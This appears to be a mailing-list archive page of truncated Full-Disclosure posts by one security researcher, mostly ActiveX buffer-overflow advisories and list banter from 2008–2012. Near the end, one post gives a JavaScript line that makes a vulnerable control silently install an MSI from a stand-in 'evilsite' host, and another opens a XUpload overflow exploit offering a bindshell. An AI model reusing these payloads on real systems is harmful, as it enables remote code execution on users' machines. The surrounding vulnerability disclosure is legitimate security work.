+1
The less an attacker knows about your infrastructure the better, as long as you
are not solely relying on that obscurity to protect said infrastructure.
Consider this: the more an attacker has to poke around because your aren't
running certain services on their default port, or say disabling
Ferenc,
I got one as well a few weeks ago. I suspect you are correct in your
assumption.
elazar
On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs wrote:
>
>Hi,
>
>Anybody else got this message? I think they are "spamming" the
>subscribers/regular participants of the list.
>
>-- Forw
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
a...@infosecinstitute.com does not designate 46.167.245.118 as
permitted sender)
Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk
(Postfix) with ESMTP id D4324C0
for ;Tue, 17 Apr 20
"Sounds like this industry could benefit from these kids even more
since they are driving home the points you all are supposed to be
warning them about."
That's because these kids don't have mouths to feed and a paycheck to
worry about. Ethics and ethos are all very nice when you have
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The report states that they have been using flash drives for map
and video data transfer. The source is probably some flight
operators personal drive which never came under the microscope,
that and "well...it's an *isolated* network so proper security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.eff.org/issues/printers
On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison
wrote:
>list,
>
> Sometime ago I remember reading an article on printers being
>used to
>gain intelligence in an embassy or government agency. The
>printer
>had a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Most people charge for that, the least Juan could do is give you a
*free* "license" for his scamware(we know you want it ;) ).
Ah, the state of so-called "security" these days...it's
sad.
elazar
On Wed, 22 Jun 2011 23:38:06 -0400 adam wrote:
>*coug
t;On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> (never start a sentence with)And just to be the grammar douche,
>> that should be:
>>
>>
>> With the latTer as the majority o
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
(never start a sentence with)And just to be the grammar douche,
that should be:
With the latTer as the majority of course.
elazar
On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
wrote:
>I agree, you should move your business to IRC. They u
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
We grappled with the same problem when setting up a virtual host in
order to mimic our production environment for training purposes.
Ultimately, we ended up purchasing a separate box for our DMZ host,
it is hard to trust separation in software(granted
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.
elazar
On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
wrote:
>Call me paranoid, but that sure wo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
It is definitely possible(http://www.cultofmac.com/android-app-
sends-personal-data-to-china/52929), there have been several well
know local root exploits(i.e. http://c-
skills.blogspot.com/2010/08/please-hold-line.html) for the Android
system, though
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Putting Phd, CISSP after your name combined with your original
request isn't going to get you much love on this list, but then
again, so much for the 30,000 ft birds eye academic view of
security(and we wonder why the so called *industry* is such a
fai
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
+1 for Vipre, its cheap(about $10 or less per seat, per year),
generally resource conscious and pretty granular centralized policy
management and last but not least, its detection and fp to fn ratio
is pretty solid. Aside from a recent issues with its
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Can't you? The world is full of unpatched systems. You can even find
systems where patches are not installed because it is running a
piece of
mission critical software and they would lose support if they
installed
any patches (I am not making this up)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ed or nano? :)
On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote:
>On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said:
>> So if Drupal and WordPress, etc. are so terrible, what would you
>all recommend?
>
>vi or emacs. Take your pick, I'm no
code.
Fix
-
SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.
Credit
-
Elazar Broad
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Thermite will definitely do, checkout
http://hackaday.com/2008/09/16/how-to-thermite-based-hard-drive-
anti-forensic-destruction/ and of course a .50 APIT round will do
as well:
http://www.ranum.com/security/computer_security/editorials/diskcrypt
/ind
>CLR, etc)
>or Native ignores the notion that the client controls hardware,
>OS, the
>executing process and the network.
>
>Signals can be intercepted at any layer.
>
>Any other assertion is ridiculous and a waste of time and effort.
>
>-Travis
>
>On Thu,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Unless you wrap your service methods with some form of an
authentication, your webservice's are just as public as any other
"world" accessible part of your site. Are the pages calling these
services behind any sort of authentication?
On Thu, 06 May 20
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 09 Oct 2009 10:24:02 -0400 Paul Schmehl
wrote:
>--On Thursday, October 08, 2009 22:16:01 -0500 Jonathan Leffler
> wrote:
>
>>
>> A reputable security defect reporting organization is claiming
>that a Windows
>> program is subject to a remote
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Works fine for me...
On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis
wrote:
>Good Day,
>
>Anyone happen to know what is going on with www.modsecurity.org or
>
>www.breach.com?
>
>Cheers,
>David
>
>-
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.sandboxie.com/
On Fri, 04 Sep 2009 14:05:24 -0400 RandallM
wrote:
>how come we just can't sandbox the browser in away from the
>system.
>its the users that just get gmail and click links, watch youtube
>vids
>and check FaceBook and Mypace
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Like them or not, M$ has done quite a bit with its SDL[1], and
though quite late in the game, the memory protection mechanism's in
Vista and Windows 7. As far as anti-virus software goes, it's
mostly useless[2][there was a recent article on signature l
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 16:34:27 -0400 Paul Schmehl
wrote:
>--On Friday, August 28, 2009 13:40:28 -0500 Rohit Patnaik
>
>wrote:
>
>>
>> To be fair, Linux has come a very long way in that regard. I
>purchased
>> an Asus Eee 900 with Linux preinstalled, a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 17:20:09 -0400 Peter Besenbruch
wrote:
>> > The OS on my machines will not allow a person to run an
>administrative
>> > desktop. It enforces the separation between the administrator
>and a
>> > normal user by requiring the creat
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
There's a few on Milw0rm(2,3,4 I believe)...
On Thu, 30 Jul 2009 00:59:34 -0400 NAHieu wrote:
>this is hilarious!
>
>i am wondering where to get other issues, i.e zf01 --> zf04?
>
>thanks,
>H
>
>On Wed, Jul 29, 2009 at 8:32 AM, Headenson
>John wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I've seen enough RAID controllers take a crap all over all the
disks far too many times in my career.
http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/
Sound familiar?
On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.ed
rded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.
Thank You – Autodesk"
Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory
Credit:
Elazar Broad
-
t;'breaking and entering' into their mind?
>
>-Travis
>
>On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad
> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I am inclined to agree, except that you still have issues with
>the
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am inclined to agree, except that you still have issues with the
electronic equivalent of breaking and entering. Case in point,
there is a good chance you would be arrested and prosecuted if you
opened the door to another persons dwelling which did n
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Belkin International, Inc.
http://www.belkin.com
What:
Belkin BullDog Plus UPS Management Software
v4.0.2 Build 1219
UPS-Service.exe
v1.0.0.1
dated 12/19/2006
How:
The UPS management software contains a built-in web server which
allows for remo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Imera(http://www.imera.com)
Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
What:
ImeraIEPlugin.dll
Version 1.0.2.54
Dated 12/02/2008
{75CC8584-86D4-4A50-B976-AA72618322C6}
http://teamlinks.imera.com/ImeraIEPlugin.cab
How:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
...stealthy infection is trickier.
but not impossible, checkout Symantec/F-Secure joint analysis of
mebroot: https://forums.symantec.com/t5/blogs/blogprintpage/blog-
id/malicious_code/article-
id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615. Now
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
"You know how the current amateur botnet offerings are basing
domain lists off the current time to allow the 'good guys' to
prepare?"
Shhh, your gonna wake the " writes all the
malware" theorists...
On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I maintain that by not educating our users we are failing in that
goal.
With many it is in one ear, out the other, unless you are allowed
to use a clue bat...
On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox
wrote:
>2009/2/6 Yudi Rosen :
>
>> But J
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Exactly, so we only make him click for non system
applets/utilities, and we determine that by digital signatures,
which is exactly how UAC is implemented in Windows 7. With that
said, now we are back to the original issue, a computer is only as
smart(o
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
And you can probably find a majority of those 72 listed here
http://www.nsopw.gov...
On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey
wrote:
>...hehe...
>
>On Mon, Jan 12, 2009 at 7:50 PM, wrote:
>
>> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
is more cost effective
should have been is *it
On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad
wrote:
>That's true, keeping up with security is not cheap nor easy.
>Tradeoff's are tradeoff's, the question is, when it comes
c 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>> And they should have listened then, it was only a matter of time
>> before someone fleshed out a practical attack, and that time is
>> now. Then again, I am sure there some
lowing up on internet carders and shutting them down.
>>
>> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad
> wrote:
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA1
>> >
>> > SSL/PKI is only as strong as the weakest CA...
>> >
>&
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am waiting for RapidSSL's reaction, then again, $12 certs, you
get what you pay for...
On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews
wrote:
>This is going to be fun for all e-commerce sites etc
>
>On Tue, Dec 30, 2008 at 7
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SSL/PKI is only as strong as the weakest CA...
For those of you who haven't been following this, here you go:
http://www.win.tue.nl/hashclash/rogue-ca/
http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt
Enjoy and Happy New Years!
elaz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
April Fools isn't for another 4 months...
On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v
wrote:
>Real researchers who should be taken seriously aren't taken
>seriously anymore.
>
>I'm leaving full-disclosure because of the abuse.
>
>It's just turned into
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?
elazar
-BEGIN
.
>
>You should revisit this opinion after you're out of school and in
>the
>workforce for 5 years. :)
>
>On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]>
>wrote:
>
>> Elazar Broad wrote:
>> > Neither, because ultimately no one care
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Financial IT has much competence, the problem is the red tape and
politics that many face when trying to get the job done, but then
again, you have that everywhere, I am just venting/lamenting over
it...
On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf
Luke Scharf <[EMAIL PROTECTED]>
wrote:
>Elazar Broad wrote:
>> Neither, because ultimately no one cares, and that is why the
>> financial industry foots the 60 billion identity theft bill. My
>> rant was a little bit of wishful thinking and a shred of belief
>in
>>
[EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said:
>> I never said we need to do something, passive awareness *can* go
>a
>> long way...
>
>Right. The danger is that you want to give the people a *reason*
>to
>care.
>
>"If you'
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I never said we need to do something, passive awareness *can* go a
long way...
On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said:
>> Changing the public opinion and mindset m
Following a major cyber-attack, he told legislators,
>electricity,
>banking, and communications could all go dead, leaving Americans
>scrounging
>for food, water, gasoline—even hunks of firewood traded on the
>black market.
>
>
>On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAI
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Brilliant use of deflection, keep it up, you might end up as some
loser serial rapist on Law and Order, oh wait, they want actor's,
not the real thing...
On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Dec 9, 2008 at 3:08
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
They ain't called beltway bandits for nothing...
On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
<[EMAIL PROTECTED]> wrote:
>Ivan, all,
>
>Hold the phone...$5k-$7k to fix an infected device!? Really?
>HOLY
>CRAP... either that's a c
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad <[EMAIL PROTECTED]>
wrote:
>Mike C wrote:
>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad <[EMAIL PROTECTED]>
>wrote:
>>
>>> and how does making a color based on these inputs protect
>people?
>>>
>>>
>>
>> On
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.
On Tue, 02 Dec 2008 14:14:43 -0500 IT
gt;--On November 26, 2008 1:59:27 AM -0600 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Um, NTLM isn't the only 20 or so year old protocol to take the
>rap
>> recently, I can thin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Um, NTLM isn't the only 20 or so year old protocol to take the rap
recently, I can think of a low numbered rfc, lets say 1034 and
1035. Hindsight is 20/20, and 20 years ago, who would have thought
that a 16 bit number was way too small for DNS transact
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec's Endpoint Protection has a device control feature which
basically functions as you have stated. I haven't really played
around with it much, however, it can block devices based on device
id...
elazar
On Mon, 24 Nov 2008 00:17:34 -0500 Bipin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
A quick test of OWA 2007 shows that it is not vulnerable...
On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham
<[EMAIL PROTECTED]> wrote:
>I found and reported this back in 2005/2006. Microsoft told me
>that it
>had been reported previously and tha
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
What scene...
On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no
>experience? i make that about 10 years experience if my math is
>correct.
>
>On Fri, Nov 7, 2008 at 1
ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Whats your poison of choice?
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Whats your poison of choice?
On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it
>I
>run out
So take it up with him like a man and not on our inboxes...
On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr.
><[EMAIL PROTECTED]> wrote:
>> And by the way, why insistently and specifically targeting
>Metasploit?
>
>i don't like hd
So the question is, is
>that the
>ethical choice? Is that a good business choice?
>
>
>Elazar Broad wrote:
>> I would opt for #1, additionally, contacting CERT and other
>quasi-
>> government security organizations would be a plus, they might
>have
>> better luck lig
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I would opt for #1, additionally, contacting CERT and other quasi-
government security organizations would be a plus, they might have
better luck lighting a fire under the theoretical vendors ass...
elazar
On Sat, 27 Sep 2008 03:39:34 + Simon Smi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Webex
http://www.webex.com/
What:
Webex Meeting Manager
http://support.webex.com/support/downloads.html
How:
The Webex Meeting Manager utilizes several ActiveX controls, one of
which is vulnerable to a stack based buffer overflow. The atucfobj
M
On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Trend Micro
>http://www.trendmicro.com
>
>What:
>OfficeScan 7.3 build 1343(Patch 4) and older
>http://www.trendmicro.com/download/product.asp?productid=5
>
>How:
>OfficeScan&#x
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Trend Micro
http://www.trendmicro.com
What:
OfficeScan 7.3 build 1343(Patch 4) and older
http://www.trendmicro.com/download/product.asp?productid=5
How:
OfficeScan's Web Console utilizes several ActiveX controls when
deploying the product throug
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Real Networks
What:
RealPlayer 11 (11.0.0 - 11.0.2 builds 6.0.14.738 - 6.0.14.802)
RealPlayer 10.5 (6.0.12.1040-6.0.12.1663, 6.0.12.1698, 6.0.12.1741)
RealPlayer 10
RealPlayer Enterprise
How:
The WindowName and Controls properties of rmoc3260.d
Or this http://www.emergingthreats.net/content/view/87/1/
On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa"
<[EMAIL PROTECTED]> wrote:
>check this out
>http://securabit.com/2008/07/24/latest-snort-signature-to-detect-
>dns-vulnerability/
>
>
>On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy
Sorry if I was not clear enough, I meant in the commit comments. I
agree, you need about a brain and a half to spot kernel bugs in the
code itself...
On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad
I could understand why Linus is against classifying a commit
comment in his branch or in a any unstable branch for that
matter...then again, the repositories are open, and anyone with
half a brain might be able to discern what has security
ramifications or not. On the other hand classifying com
[EMAIL PROTECTED]
http://osvdb.org/vendor/1/Oracle%20Corporation
On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen
<[EMAIL PROTECTED]> wrote:
>Anyone have it?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full
I can confirm the same behavior on a Cisco PIX 501 running 6.3(5).
Port numbers are incremented sequentially by one...
On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]>
wrote:
>Riad,
>
>Thanks for testing this. A number of other readers wrote me
>privately
>confirming your
Probably, I completely missed that, and they do seem to be the
defaults. I'll test it out tomorrow. Thanks Paul!
On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo
<[EMAIL PROTECTED]> wrote:
>Elazar,
>
>> ... Internet Explorer [with] proxy auto-configuration ...
>> The pac file specifies a direct con
I got an interesting issue with Internet Explorer(6 and 7 on
Windows XP SP2) and proxy auto-configuration files. I was wondering
if anyone has a similar setup and is experiencing behavior like
this. My setup is as follows. Client machines are configured to use
a PAC file via group policy. The p
"We are an impatient lot in this community." - well said...
On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux"
<[EMAIL PROTECTED]> wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclousure. We only recei
Does anyone have a security contact for Autodesk?
elazar
--
Let great B to B marketing solutions propel your brand to new heights! Click
now!
http://tagline.hushmail.com/fc/Ioyw6h4euHqyTMpSKWWGNSUg4MAvp9z9bcMg7Dx2cKwC9V6EIDLvFO/
___
Full-Disclosure -
AIL PROTECTED]> wrote:
>--On Friday, May 23, 2008 11:56:15 -0400 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Its not even funny how often this happens. I have a friend who
>does
>> some consu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The out of the box ruleset for SmartDefense on the FW1 does some
basic string checking on web traffic(i.e. checking get and post
variables for sql injection and xss etc.) along with some strict
RFC checks, I don't know to what extent though...
Elazar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Its not even funny how often this happens. I have a friend who does
some consulting work for small businesses, and the amount of times
that he has come across medical practices that run their billing
and record keeping software on the same "fully-loade
Yea, and there are plenty that can't even set up their own home
network...
On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]>
wrote:
>> CISSP's cant hack
>
>Huh?
>
>There are plenty of CISSPs you wouldn't want on your bad side.
>They just decided to grow up and make a legitimate livi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Keep in mind that rootkit functionality itself isn't all bad, take
anti-virus software for example. Its like a shark trawling the
bottom of the sea floor, looking up at its next meal on high; how
deeply can you hook the OS core...
Elazar
On Sun, 18 M
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Now that this is patched...
http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb
Elazar
On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Let the foolz begin :) Happy April 1st!
On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<[EMAIL PROTECTED]> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WIT
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Real Networks
http://www.real.com
What:
Real Networks Real Player is a popular media player.
How:
Real Player utilizes an ActiveX control to play content within the
users browser.
rmoc3260.dll version 6.0.10.45
{2F542A2E-EDC9-4BF7-8CB1-87C9919F
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Move Networks
http://www.movenetworks.com/
What:
Move Networks is a streaming media provider who's clients include
Fox, ABC, ESPN etc. They employ an ActiveX control to display
content in the clients browser.
How:
qsp2ie07074039.dll version 7.7.
http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Who:
Yahoo!
http://www.yahoo.com
What:
mediagrid.dll version 2.2.2.56
{22FD7C0A-850C-4A53-9821-0B0915C96139}
Implements IObjectSafety
This control is used with the Yahoo! JukeBox application.
How:
The 2nd parameter of the AddBitmap() method is vulnerable to a
buffer overflow.
Fix:
No official
Who:
FaceBook
http://www.facebook.com
Aurigma
http://www.aurigma.com
What:
FaceBook uses Aurigma's ImageUploader control. This control enables
users to upload photos to FaceBook.
How:
Please note that this vulnerability is DIFFERENT than the one that
I previously posted. This also affects the
Who:
MySpace
http://www.myspace.com
What:
MySpace repackages Aurigma's ImageUploader ActiveX. This control
enables MySpace users to upload images to their MySpace page(s).
How:
MySpaceUploader.ocx version 1.0.0.4
{48DD0448-9209-4F81-9F6D-D83562940134}
This control is vulnerable to a buffer over
Who:
Move Networks
http://www.movenetworks.com/
What:
Move Networks Quantum Streaming Player Upgrade Manager
How:
QMPUpgrade.dll version 1.0.0.1
{6054D082-355D-4B47-B77C-36A778899F48}
QMPUpgrade.dll is packaged with an older version of the Quantum
player. The player itself has several vulnerabi
Who:
Hewlett-Packard
What:
HP Virtual Rooms is a suite of online collaboration, training and
support tools.
How:
HP uses an ActiveX control to install the Virtual Rooms client.
Several properties including AuthenticationURL, PortalAPIURL,
cabroot are vulnerable to a buffer overflow.
hpvirtual
Cryptsetup with LUKS is an option, you could build a custom kernel
and initrd and put it on a UFD...
Elazar
On Wed, 16 Jan 2008 10:38:37 -0500 coderman <[EMAIL PROTECTED]>
wrote:
>On Jan 16, 2008 4:53 AM, Frank Sanders <[EMAIL PROTECTED]>
>wrote:
>> Can any one recommend such system ?
>
>ingre
e) on Milw0rm, exploiting this is pretty self
explanatory though...
Elazar
On Mon, 14 Jan 2008 19:51:22 + Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software
system.
On Mon, 14 Jan 2008 14:51:22 -0500 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software products. It is generally used in
>conjunction with the I
Who:
Macrovision
What:
Macrovision FlexNext Connect is a software package that allows
ISV's to update their software products. It is generally used in
conjunction with the InstallShield software deploymnet framework.
FlexNet uses a number of ActiveX controls, some of which are marked
safe for
Who:
http://www.streamaudio.com
StreamAudio(formerly ChainCast) is a provides streaming media for
radio broadcasters.
What:
StreamAudio utilizes an Active control that acts as a proxy between
StreamAudio and Windows Media Player which actually plays the
content.
This control is marked as follo
I was playing with this a bit more. Everybody has the Windows
Installer installed, right? How about this:
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe",
"","/i http://www.evilsite.com/evilapp.msi /quiet");
Elazar
On Tue, 08 Jan 2008 20:08:53 -0500 [EMAIL PROTECTED] wrote:
I took a shot at writing an exploit for this, so here goes. Choice of
WinExec(the calculator, what else?) or a bindshell.
---
Persits Software XUpload Control AddFolder BoF Exploit
function Check() {
var buf = 'A'; while (buf.length <= 1387) buf
1 - 100 of 127 matches
Mail list logo
